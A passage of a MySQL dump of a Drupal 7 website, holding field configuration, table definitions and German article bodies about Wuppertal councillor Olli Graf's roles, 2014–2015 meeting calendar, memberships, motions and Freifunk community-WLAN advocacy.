keys\";a:1:{s:6:\"format\";a:2:{s:5:\"table\";s:13:\"filter_format\";s:7:\"columns\";a:1:{s:6:\"format\";s:6:\"format\";}}}s:7:\"indexes\";a:1:{s:6:\"format\";a:1:{i:0;s:6:\"format\";}}}',1,0,0),(3,'field_tags','taxonomy_term_reference','taxonomy',1,'field_sql_storage','field_sql_storage',1,0,'a:6:{s:8:\"settings\";a:1:{s:14:\"allowed_values\";a:1:{i:0;a:2:{s:10:\"vocabulary\";s:4:\"tags\";s:6:\"parent\";i:0;}}}s:12:\"entity_types\";a:0:{}s:12:\"translatable\";b:0;s:7:\"storage\";a:4:{s:4:\"type\";s:17:\"field_sql_storage\";s:8:\"settings\";a:0:{}s:6:\"module\";s:17:\"field_sql_storage\";s:6:\"active\";i:1;}s:12:\"foreign keys\";a:1:{s:3:\"tid\";a:2:{s:5:\"table\";s:18:\"taxonomy_term_data\";s:7:\"columns\";a:1:{s:3:\"tid\";s:3:\"tid\";}}}s:7:\"indexes\";a:1:{s:3:\"tid\";a:1:{i:0;s:3:\"tid\";}}}',-1,0,0),(4,'field_image','image','image',1,'field_sql_storage','field_sql_storage',1,0,'a:6:{s:7:\"indexes\";a:1:{s:3:\"fid\";a:1:{i:0;s:3:\"fid\";}}s:8:\"settings\";a:2:{s:10:\"uri_scheme\";s:6:\"public\";s:13:\"default_image\";b:0;}s:7:\"storage\";a:4:{s:4:\"type\";s:17:\"field_sql_storage\";s:8:\"settings\";a:0:{}s:6:\"module\";s:17:\"field_sql_storage\";s:6:\"active\";i:1;}s:12:\"entity_types\";a:0:{}s:12:\"translatable\";b:0;s:12:\"foreign keys\";a:1:{s:3:\"fid\";a:2:{s:5:\"table\";s:12:\"file_managed\";s:7:\"columns\";a:1:{s:3:\"fid\";s:3:\"fid\";}}}}',1,0,0); /*!40000 ALTER TABLE `field_config` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `field_config_instance` -- DROP TABLE IF EXISTS `field_config_instance`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `field_config_instance` ( `id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'The primary identifier for a field instance', `field_id` int(11) NOT NULL COMMENT 'The identifier of the field attached by this instance', `field_name` varchar(32) NOT NULL DEFAULT '', `entity_type` varchar(32) NOT NULL DEFAULT '', `bundle` varchar(128) NOT NULL DEFAULT '', `data` longblob NOT NULL, `deleted` tinyint(4) NOT NULL DEFAULT '0', PRIMARY KEY (`id`), KEY `field_name_bundle` (`field_name`,`entity_type`,`bundle`), KEY `deleted` (`deleted`) ) ENGINE=InnoDB AUTO_INCREMENT=9 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `field_config_instance` -- LOCK TABLES `field_config_instance` WRITE; /*!40000 ALTER TABLE `field_config_instance` DISABLE KEYS */; INSERT INTO `field_config_instance` VALUES (1,1,'comment_body','comment','comment_node_page','a:6:{s:5:\"label\";s:7:\"Comment\";s:8:\"settings\";a:2:{s:15:\"text_processing\";i:1;s:18:\"user_register_form\";b:0;}s:8:\"required\";b:1;s:7:\"display\";a:1:{s:7:\"default\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:12:\"text_default\";s:6:\"weight\";i:0;s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";}}s:6:\"widget\";a:4:{s:4:\"type\";s:13:\"text_textarea\";s:8:\"settings\";a:1:{s:4:\"rows\";i:5;}s:6:\"weight\";i:0;s:6:\"module\";s:4:\"text\";}s:11:\"description\";s:0:\"\";}',0),(2,2,'body','node','page','a:6:{s:5:\"label\";s:4:\"Body\";s:6:\"widget\";a:4:{s:4:\"type\";s:26:\"text_textarea_with_summary\";s:8:\"settings\";a:2:{s:4:\"rows\";i:20;s:12:\"summary_rows\";i:5;}s:6:\"weight\";i:-4;s:6:\"module\";s:4:\"text\";}s:8:\"settings\";a:3:{s:15:\"display_summary\";b:1;s:15:\"text_processing\";i:1;s:18:\"user_register_form\";b:0;}s:7:\"display\";a:2:{s:7:\"default\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:12:\"text_default\";s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";s:6:\"weight\";i:0;}s:6:\"teaser\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:23:\"text_summary_or_trimmed\";s:8:\"settings\";a:1:{s:11:\"trim_length\";i:600;}s:6:\"module\";s:4:\"text\";s:6:\"weight\";i:0;}}s:8:\"required\";b:0;s:11:\"description\";s:0:\"\";}',0),(3,1,'comment_body','comment','comment_node_article','a:6:{s:5:\"label\";s:7:\"Comment\";s:8:\"settings\";a:2:{s:15:\"text_processing\";i:1;s:18:\"user_register_form\";b:0;}s:8:\"required\";b:1;s:7:\"display\";a:1:{s:7:\"default\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:12:\"text_default\";s:6:\"weight\";i:0;s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";}}s:6:\"widget\";a:4:{s:4:\"type\";s:13:\"text_textarea\";s:8:\"settings\";a:1:{s:4:\"rows\";i:5;}s:6:\"weight\";i:0;s:6:\"module\";s:4:\"text\";}s:11:\"description\";s:0:\"\";}',0),(4,2,'body','node','article','a:6:{s:5:\"label\";s:4:\"Body\";s:6:\"widget\";a:4:{s:4:\"type\";s:26:\"text_textarea_with_summary\";s:8:\"settings\";a:2:{s:4:\"rows\";i:20;s:12:\"summary_rows\";i:5;}s:6:\"weight\";i:-4;s:6:\"module\";s:4:\"text\";}s:8:\"settings\";a:3:{s:15:\"display_summary\";b:1;s:15:\"text_processing\";i:1;s:18:\"user_register_form\";b:0;}s:7:\"display\";a:2:{s:7:\"default\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:12:\"text_default\";s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";s:6:\"weight\";i:0;}s:6:\"teaser\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:23:\"text_summary_or_trimmed\";s:8:\"settings\";a:1:{s:11:\"trim_length\";i:600;}s:6:\"module\";s:4:\"text\";s:6:\"weight\";i:0;}}s:8:\"required\";b:0;s:11:\"description\";s:0:\"\";}',0),(5,3,'field_tags','node','article','a:6:{s:5:\"label\";s:4:\"Tags\";s:11:\"description\";s:63:\"Enter a comma-separated list of words to describe your content.\";s:6:\"widget\";a:4:{s:4:\"type\";s:21:\"taxonomy_autocomplete\";s:6:\"weight\";i:-4;s:8:\"settings\";a:2:{s:4:\"size\";i:60;s:17:\"autocomplete_path\";s:21:\"taxonomy/autocomplete\";}s:6:\"module\";s:8:\"taxonomy\";}s:7:\"display\";a:2:{s:7:\"default\";a:5:{s:4:\"type\";s:28:\"taxonomy_term_reference_link\";s:6:\"weight\";i:10;s:5:\"label\";s:5:\"above\";s:8:\"settings\";a:0:{}s:6:\"module\";s:8:\"taxonomy\";}s:6:\"teaser\";a:5:{s:4:\"type\";s:28:\"taxonomy_term_reference_link\";s:6:\"weight\";i:10;s:5:\"label\";s:5:\"above\";s:8:\"settings\";a:0:{}s:6:\"module\";s:8:\"taxonomy\";}}s:8:\"settings\";a:1:{s:18:\"user_register_form\";b:0;}s:8:\"required\";b:0;}',0),(6,4,'field_image','node','article','a:6:{s:5:\"label\";s:5:\"Image\";s:11:\"description\";s:40:\"Upload an image to go with this article.\";s:8:\"required\";b:0;s:8:\"settings\";a:9:{s:14:\"file_directory\";s:11:\"field/image\";s:15:\"file_extensions\";s:16:\"png gif jpg jpeg\";s:12:\"max_filesize\";s:0:\"\";s:14:\"max_resolution\";s:0:\"\";s:14:\"min_resolution\";s:0:\"\";s:9:\"alt_field\";b:1;s:11:\"title_field\";s:0:\"\";s:13:\"default_image\";i:0;s:18:\"user_register_form\";b:0;}s:6:\"widget\";a:4:{s:4:\"type\";s:11:\"image_image\";s:8:\"settings\";a:2:{s:18:\"progress_indicator\";s:8:\"throbber\";s:19:\"preview_image_style\";s:9:\"thumbnail\";}s:6:\"weight\";i:-1;s:6:\"module\";s:5:\"image\";}s:7:\"display\";a:2:{s:7:\"default\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:5:\"image\";s:8:\"settings\";a:2:{s:11:\"image_style\";s:5:\"large\";s:10:\"image_link\";s:0:\"\";}s:6:\"weight\";i:-1;s:6:\"module\";s:5:\"image\";}s:6:\"teaser\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:5:\"image\";s:8:\"settings\";a:2:{s:11:\"image_style\";s:6:\"medium\";s:10:\"image_link\";s:7:\"content\";}s:6:\"weight\";i:-1;s:6:\"module\";s:5:\"image\";}}}',0),(7,1,'comment_body','comment','comment_node_blog','a:6:{s:5:\"label\";s:7:\"Comment\";s:8:\"settings\";a:2:{s:15:\"text_processing\";i:1;s:18:\"user_register_form\";b:0;}s:8:\"required\";b:1;s:7:\"display\";a:1:{s:7:\"default\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:12:\"text_default\";s:6:\"weight\";i:0;s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";}}s:6:\"widget\";a:4:{s:4:\"type\";s:13:\"text_textarea\";s:8:\"settings\";a:1:{s:4:\"rows\";i:5;}s:6:\"weight\";i:0;s:6:\"module\";s:4:\"text\";}s:11:\"description\";s:0:\"\";}',0),(8,2,'body','node','blog','a:6:{s:5:\"label\";s:4:\"Body\";s:6:\"widget\";a:4:{s:4:\"type\";s:26:\"text_textarea_with_summary\";s:8:\"settings\";a:2:{s:4:\"rows\";i:20;s:12:\"summary_rows\";i:5;}s:6:\"weight\";i:-4;s:6:\"module\";s:4:\"text\";}s:8:\"settings\";a:3:{s:15:\"display_summary\";b:1;s:15:\"text_processing\";i:1;s:18:\"user_register_form\";b:0;}s:7:\"display\";a:2:{s:7:\"default\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:12:\"text_default\";s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";s:6:\"weight\";i:0;}s:6:\"teaser\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:23:\"text_summary_or_trimmed\";s:8:\"settings\";a:1:{s:11:\"trim_length\";i:600;}s:6:\"module\";s:4:\"text\";s:6:\"weight\";i:0;}}s:8:\"required\";b:0;s:11:\"description\";s:0:\"\";}',0); /*!40000 ALTER TABLE `field_config_instance` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `field_data_body` -- DROP TABLE IF EXISTS `field_data_body`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `field_data_body` ( `entity_type` varchar(128) NOT NULL DEFAULT '' COMMENT 'The entity type this data is attached to', `bundle` varchar(128) NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance', `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted', `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to', `revision_id` int(10) unsigned DEFAULT NULL COMMENT 'The entity revision id this data is attached to, or NULL if the entity type is not versioned', `language` varchar(32) NOT NULL DEFAULT '' COMMENT 'The language for this data item.', `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields', `body_value` longtext, `body_summary` longtext, `body_format` varchar(255) DEFAULT NULL, PRIMARY KEY (`entity_type`,`entity_id`,`deleted`,`delta`,`language`), KEY `entity_type` (`entity_type`), KEY `bundle` (`bundle`), KEY `deleted` (`deleted`), KEY `entity_id` (`entity_id`), KEY `revision_id` (`revision_id`), KEY `language` (`language`), KEY `body_format` (`body_format`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Data storage for field 2 (body)'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `field_data_body` -- LOCK TABLES `field_data_body` WRITE; /*!40000 ALTER TABLE `field_data_body` DISABLE KEYS */; INSERT INTO `field_data_body` VALUES ('node','article',0,3,3,'und',0,'Olli Graf\r\n
                                              \r\n
                                            • Stadtverordneter im Rat der Stadt Wuppertal
                                            • \r\n
                                            • Mitglied im Betriebsauschuss Gebäudemanagement
                                            • \r\n
                                            • beratendes Mitglied im Auschuss für Stadtentwicklung, Wirtschaft und Bauen (StaWiBau)
                                            • \r\n
                                            • Mitglied der Piratenpartei
                                            • \r\n
                                            • Mitglied der Fraktion Bündnis 90/ Die Grünen
                                            • \r\n','','filtered_html'),('node','article',0,4,4,'und',0,'21.11.2014 Tag der Offenen Tür AIDS-Hilfe Wuppertal\r\n23.11.2014 Kreismitgliederversammlung\r\n26.11.2014 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n26.11.2014 Bürgerbegehren gegen den Verkauf des Carnaper Platzes\r\n01.12.2014 Filmpremiere – Dokumentation »Stigma ADHS« zum Thema ADHS bei Kindern\r\n03.12.2014 BV Elberfeld\r\n09.12.2014 BV Barmen\r\n15.12.2014 Ratssitzung\r\n19.12.2014 offiz. Eröffnung der Nordbahntrasse\r\n\r\nJanuar\r\n11.02.2015 Wuppertal 3.0\r\n24.02.2015 BV Barmen\r\n25.02.2015 BV Elberfeld\r\n\r\n\r\n18.01.2015 Neujahrsempfang Bürgerverein Langerfeld und Förderverein der Gesamtschule Langerfeld\r\n28.01. 2015 BV Elberfeld\r\n\r\nFebruar\r\n09.02.2015 Gemeinsame Sondersitzung der Ausschüsse Finanzen,StaWiBau und Beteiligungssteuerung\r\n10.02.2015 Ratssondersitzung\r\n\r\nMärz\r\n3.03.2015 Wuppertal 3.0\r\n09.03.2015 Ratssitzung\r\n25.03.2015 Wuppertal 3.0\r\n26.03.2015 Sondersitzung StaWiBau\r\n26.03.2015 Ratssondersitzung\r\n\r\nApril\r\n14.04.2015 Wuppertal 3.0\r\n17.04.2015 70. Jahrestag der Befreiung vom Nationalsozialismus in Wuppertal (Gedenkfeier und Befreiungsfest)\r\n18.04.2015 Landesparteitag 2015.1\r\n19.04.2015 Landesparteitag 2015.1\r\n23.04.2015 Betriebsauschuss Gebäudemanagement (fällt aus)\r\n28.04.2014 BV Barmen\r\n29.04.2015 BV Elberfeld\r\n30.04.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n\r\nMai\r\n06.05.2015 Wuppertal 3.0\r\n11.05.2015 Ratssitzung\r\n13.05.2015 Beirat der Menschen mit Behinderung (Vetretung)\r\n19.05.2015 Auftaktveranstaltung Seilbahnprojekt\r\n20.05.2015 Diskussionsveranstaltung \"Das solidarische Bürgerticket\"\r\n21.05.2015 Wuppertal 3.0\r\n30.05.2015 Wuppertal 3.0\r\n\r\nJuni\r\n04.06.2015 Barmen Live\r\n06.06.2015 kommunales Mandatsträgertreffen\r\n09.06.2015 BV Barmen\r\n10.06.2015 BV Elberfeld\r\n11.06.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n11.06.2015 Ausstellung und Gespräch Seilbahnprojekt\r\n13.06.2015 Freiheit statt Angst Demo Düsseldorf\r\n16.06.2015 Infotermin mit Ausstellung Seilbahnprojekt\r\n16.06.2015 Podiumsdiskussion über ein bedingungsloses Grundeinkommen\r\n22.06.2015 Ratssitzung\r\n24.06.2015 Infoveranstaltung Ausbau L 419\r\n29.06.2015 Beginn der Sommerferien\r\n\r\nJuli\r\n23.07.20.15 Sondersitzung Stadtentwicklung, Wirtschaft und Bauen\r\n25.07.2015 Bundesparteitag 2015.1\r\n26.07.2015 Bundesparteitag 2015.1\r\n28.07.2015 Wahlausschuss für die Oberbürgermeisterwahl am 13. September 2015\r\n\r\nAugust\r\n17.08.2015 Ratssitzung\r\n20.08.2015 Betriebsauschuss Gebäudemanagement\r\n25.08.2015 BV Barmen\r\n27.08.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n\r\nSeptember\r\n01.09.2015 Ausschuss für Gleichstellung (Vertretung)\r\n05.09.2015 Heckinghausen ist bunt - für alle (Demo)\r\n07.09.2015 Ratssitzung\r\n13.09.2015 Oberbürgermeisterwahl\r\n15.09.2015 Wahlausschuss\r\n17.09.2015 Mit uns TTIP & CETA durchschauen!\r\n20.09.2015 kommunales Vernetzungstreffen\r\n\r\nOktober\r\n24./25.10.2015 Landesparteitag in Aachen\r\n27.10.2015 Ratssitzung\r\n28.10.2015 BV Elberfeld\r\n29.10.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n\r\nNovember\r\n09.11.2015 Ratssitzung\r\n10.11.2015 Letzte Ausfahrt Paris 2015 -Ende oder Wende\r\n23.11.2015 Eröffnung Lichtermarkt Elberfeld /Weihnachtsmarkt Barmen\r\n26.11.2015 Betriebsausschuss Gebäudemanagement\r\n\r\nDezember\r\n02.12.2015 BV Elberfeld\r\n03.12.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n14.12.2015 Ratssitzung\r\n\r\n\r\nJeden 2. und 4. Donnerstag eines Monats Stammtisch im Abgeordnetenbüro Wichlinghauser Str. 61\r\n','','filtered_html'),('node','article',0,5,5,'und',0,'Ich bin Mitglied in folgenden Organisationen:\r\n\r\n
                                                \r\n
                                              • ASV -Allgemeiner Sportverein Wuppertal e.V.
                                              • \r\n
                                              • ADAC - Allgemeiner Deutscher Automobilclub e.V.
                                              • \r\n
                                              • Musikpiraten e.V.
                                              • \r\n
                                              • NAG - Neue Assekuranz Gewerkschaft
                                              • \r\n
                                              • Piratenpartei NRW
                                              • \r\n
                                              • piKo NRW e.V.
                                              • \r\n
                                              ','','filtered_html'),('node','article',0,6,6,'und',0,'Diese Anträge habe ich (in Zusammenarbeit mit anderen Fraktionen) miteingereicht.\r\n\r\n30.09.2014 Ja zur kommunalen Selbstverwaltung und zur kommunalen Daseinsvorsorge\r\n10.02.2015 Aufhebung des Ratsbeschlusses zum Verkauf des Carnaper Platzes\r\n22.06.2015 Öffentliches WLAN in Wuppertal fördern - Freifunk-Standorte auf städtischen Gebäuden einrichten\r\n','','filtered_html'),('node','article',0,7,7,'und',0,'Ich bin schon seit Jahren ein Fan der Freifunk Idee.\r\nIch betreibe seit März 2015 den Freifunk Node im oberen Fischertal \"ff-ollital\".\r\nIn Zusammenarbeit mit Freifunk Wuppertal hat die Fraktion Bündnis 90 / Die Grünen\r\n einen Antrag in den Rat eingebracht, um das freie Internet in Wuppertal zu\r\nfördern.\r\nDas Gebäudemanagement hat dem Antrag vorbehaltlich der Kostenfrage am 16.04.2015\r\nzugestimmt.\r\nDer Stadtrat hat den Antrag am 11.02.2015 an den Stadtentwicklungsauschuss (Sitzung 11.06.) verwiesen, da die Verwaltung aber bis dahin das geforderte rechtliche Gutachten vorlegen konnte, haben wir den Antrag deshalb auf die Ausschusssitzung im August vertagt.\r\n\r\nDer Landtag NRW hat am 25.06.2015 beschlossen, die Dachflächen der landeseigenen Gebäuden dem Freifunk Rheinland e.V. zur Verfügung zu stellen.\r\n\r\nAm 19.08.2015 gab das GMW überraschend in einer Pressekonferenz bekannt, 850 Standorte für Router zur Verfügung zu stellen.\r\n\r\nIn der Ratssitzung vom 07.09.2015 wurde dies auch formell einstimmig beschlossen.\r\nHier sieht man die Auslastung der Router in Utopiastadt beim Trassenfest am 19.04.2015 sehr deutlich. 150 Clients waren zeitweise gleichzeitig verbunden.\r\n\r\nEs ist natürlich jedermensch freigestellt, einen eigenen Freifunk Node bei sich zu Hause zu betreiben.\r\nJe dichter die Vermaschung ist, desto wirksamer ist das ganze System.\r\n\r\nVielen Dank an Lukas Lamla, Babak Tubis und Ralf Glörfeld, die mit ihren Antworten und Erklärungen viel zu meinem Verständnis des Themas beigetragen haben.\r\n\r\nLinksammlung:\r\nBericht der Aktuellen Stunde zum Landtagsbeschluss\r\nFreifunk in Arnsberg realisiert (Arnsberg Info)\r\nStädte, die Freifunk aktiv unterstützen (Freifunk Forum)\r\nStromverbrauch (Freifunk Stuttgart)\r\nStromkosten (Freifunk Kiel)\r\nStrahlungsbelastung (Aktionsprogramm Umwelt und Gesundheit NRW)\r\nSprach- und Datenübertragung per Funk: Bluetooth und WLAN (Bundesamt für Strahlungsschutz)\r\nFreifunkantrag der Piratenfraktion im Landtag NRW\r\nFreifunk Rheinland e.V.\r\n350 neue WLAN-Standorte für Wien (ORF AT)\r\nSo bekommt Wuppertal WLAN (WZ-Newsline)','','filtered_html'); /*!40000 ALTER TABLE `field_data_body` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `field_data_comment_body` -- DROP TABLE IF EXISTS `field_data_comment_body`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `field_data_comment_body` ( `entity_type` varchar(128) NOT NULL DEFAULT '' COMMENT 'The entity type this data is attached to', `bundle` varchar(128) NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance', `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted', `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to', `revision_id` int(10) unsigned DEFAULT NULL COMMENT 'The entity revision id this data is attached to, or NULL if the entity type is not versioned', `language` varchar(32) NOT NULL DEFAULT '' COMMENT 'The language for this data item.', `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields', `comment_body_value` longtext, `comment_body_format` varchar(255) DEFAULT NULL, PRIMARY KEY (`entity_type`,`entity_id`,`deleted`,`delta`,`language`), KEY `entity_type` (`entity_type`), KEY `bundle` (`bundle`), KEY `deleted` (`deleted`), KEY `entity_id` (`entity_id`), KEY `revision_id` (`revision_id`), KEY `language` (`language`), KEY `comment_body_format` (`comment_body_format`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Data storage for field 1 (comment_body)'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `field_data_comment_body` -- LOCK TABLES `field_data_comment_body` WRITE; /*!40000 ALTER TABLE `field_data_comment_body` DISABLE KEYS */; /*!40000 ALTER TABLE `field_data_comment_body` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `field_data_field_image` -- DROP TABLE IF EXISTS `field_data_field_image`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `field_data_field_image` ( `entity_type` varchar(128) NOT NULL DEFAULT '' COMMENT 'The entity type this data is attached to', `bundle` varchar(128) NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance', `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted', `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to', `revision_id` int(10) unsigned DEFAULT NULL COMMENT 'The entity revision id this data is attached to, or NULL if the entity type is not versioned', `language` varchar(32) NOT NULL DEFAULT '' COMMENT 'The language for this data item.', `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields', `field_image_fid` int(10) unsigned DEFAULT NULL COMMENT 'The file_managed.fid being referenced in this field.', `field_image_alt` varchar(512) DEFAULT NULL COMMENT 'Alternative image text, for the image’s ’alt’ attribute.', `field_image_title` varchar(1024) DEFAULT NULL COMMENT 'Image title text, for the image’s ’title’ attribute.', `field_image_width` int(10) unsigned DEFAULT NULL COMMENT 'The width of the image in pixels.', `field_image_height` int(10) unsigned DEFAULT NULL COMMENT 'The height of the image in pixels.', PRIMARY KEY (`entity_type`,`entity_id`,`deleted`,`delta`,`language`), KEY `entity_type` (`entity_type`), KEY `bundle` (`bundle`), KEY `deleted` (`deleted`), KEY `entity_id` (`entity_id`), KEY `revision_id` (`revision_id`), KEY `language` (`language`), KEY `field_image_fid` (`field_image_fid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Data storage for field 4 (field_image)'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `field_data_field_image` -- LOCK TABLES `field_data_field_image` WRITE; /*!40000 ALTER TABLE `field_data_field_image` DISABLE KEYS */; /*!40000 ALTER TABLE `field_data_field_image` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `field_data_field_tags` -- DROP TABLE IF EXISTS `field_data_field_tags`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `field_data_field_tags` ( `entity_type` varchar(128) NOT NULL DEFAULT '' COMMENT 'The entity type this data is attached to', `bundle` varchar(128) NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance', `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted', `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to', `revision_id` int(10) unsigned DEFAULT NULL COMMENT 'The entity revision id this data is attached to, or NULL if the entity type is not versioned', `language` varchar(32) NOT NULL DEFAULT '' COMMENT 'The language for this data item.', `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields', `field_tags_tid` int(10) unsigned DEFAULT NULL, PRIMARY KEY (`entity_type`,`entity_id`,`deleted`,`delta`,`language`), KEY `entity_type` (`entity_type`), KEY `bundle` (`bundle`), KEY `deleted` (`deleted`), KEY `entity_id` (`entity_id`), KEY `revision_id` (`revision_id`), KEY `language` (`language`), KEY `field_tags_tid` (`field_tags_tid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Data storage for field 3 (field_tags)'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `field_data_field_tags` -- LOCK TABLES `field_data_field_tags` WRITE; /*!40000 ALTER TABLE `field_data_field_tags` DISABLE KEYS */; INSERT INTO `field_data_field_tags` VALUES ('node','article',0,4,4,'und',0,3),('node','article',0,6,6,'und',0,1),('node','article',0,6,6,'und',1,2); /*!40000 ALTER TABLE `field_data_field_tags` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `field_revision_body` -- DROP TABLE IF EXISTS `field_revision_body`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `field_revision_body` ( `entity_type` varchar(128) NOT NULL DEFAULT '' COMMENT 'The entity type this data is attached to', `bundle` varchar(128) NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance', `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted', `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to', `revision_id` int(10) unsigned NOT NULL COMMENT 'The entity revision id this data is attached to', `language` varchar(32) NOT NULL DEFAULT '' COMMENT 'The language for this data item.', `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields', `body_value` longtext, `body_summary` longtext, `body_format` varchar(255) DEFAULT NULL, PRIMARY KEY (`entity_type`,`entity_id`,`revision_id`,`deleted`,`delta`,`language`), KEY `entity_type` (`entity_type`), KEY `bundle` (`bundle`), KEY `deleted` (`deleted`), KEY `entity_id` (`entity_id`), KEY `revision_id` (`revision_id`), KEY `language` (`language`), KEY `body_format` (`body_format`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Revision archive storage for field 2 (body)'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `field_revision_body` -- LOCK TABLES `field_revision_body` WRITE; /*!40000 ALTER TABLE `field_revision_body` DISABLE KEYS */; INSERT INTO `field_revision_body` VALUES ('node','article',0,3,3,'und',0,'Olli Graf\r\n
                                                \r\n
                                              • Stadtverordneter im Rat der Stadt Wuppertal
                                              • \r\n
                                              • Mitglied im Betriebsauschuss Gebäudemanagement
                                              • \r\n
                                              • beratendes Mitglied im Auschuss für Stadtentwicklung, Wirtschaft und Bauen (StaWiBau)
                                              • \r\n
                                              • Mitglied der Piratenpartei
                                              • \r\n
                                              • Mitglied der Fraktion Bündnis 90/ Die Grünen
                                              • \r\n','','filtered_html'),('node','article',0,4,4,'und',0,'21.11.2014 Tag der Offenen Tür AIDS-Hilfe Wuppertal\r\n23.11.2014 Kreismitgliederversammlung\r\n26.11.2014 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n26.11.2014 Bürgerbegehren gegen den Verkauf des Carnaper Platzes\r\n01.12.2014 Filmpremiere – Dokumentation »Stigma ADHS« zum Thema ADHS bei Kindern\r\n03.12.2014 BV Elberfeld\r\n09.12.2014 BV Barmen\r\n15.12.2014 Ratssitzung\r\n19.12.2014 offiz. Eröffnung der Nordbahntrasse\r\n\r\nJanuar\r\n11.02.2015 Wuppertal 3.0\r\n24.02.2015 BV Barmen\r\n25.02.2015 BV Elberfeld\r\n\r\n\r\n18.01.2015 Neujahrsempfang Bürgerverein Langerfeld und Förderverein der Gesamtschule Langerfeld\r\n28.01. 2015 BV Elberfeld\r\n\r\nFebruar\r\n09.02.2015 Gemeinsame Sondersitzung der Ausschüsse Finanzen,StaWiBau und Beteiligungssteuerung\r\n10.02.2015 Ratssondersitzung\r\n\r\nMärz\r\n3.03.2015 Wuppertal 3.0\r\n09.03.2015 Ratssitzung\r\n25.03.2015 Wuppertal 3.0\r\n26.03.2015 Sondersitzung StaWiBau\r\n26.03.2015 Ratssondersitzung\r\n\r\nApril\r\n14.04.2015 Wuppertal 3.0\r\n17.04.2015 70. Jahrestag der Befreiung vom Nationalsozialismus in Wuppertal (Gedenkfeier und Befreiungsfest)\r\n18.04.2015 Landesparteitag 2015.1\r\n19.04.2015 Landesparteitag 2015.1\r\n23.04.2015 Betriebsauschuss Gebäudemanagement (fällt aus)\r\n28.04.2014 BV Barmen\r\n29.04.2015 BV 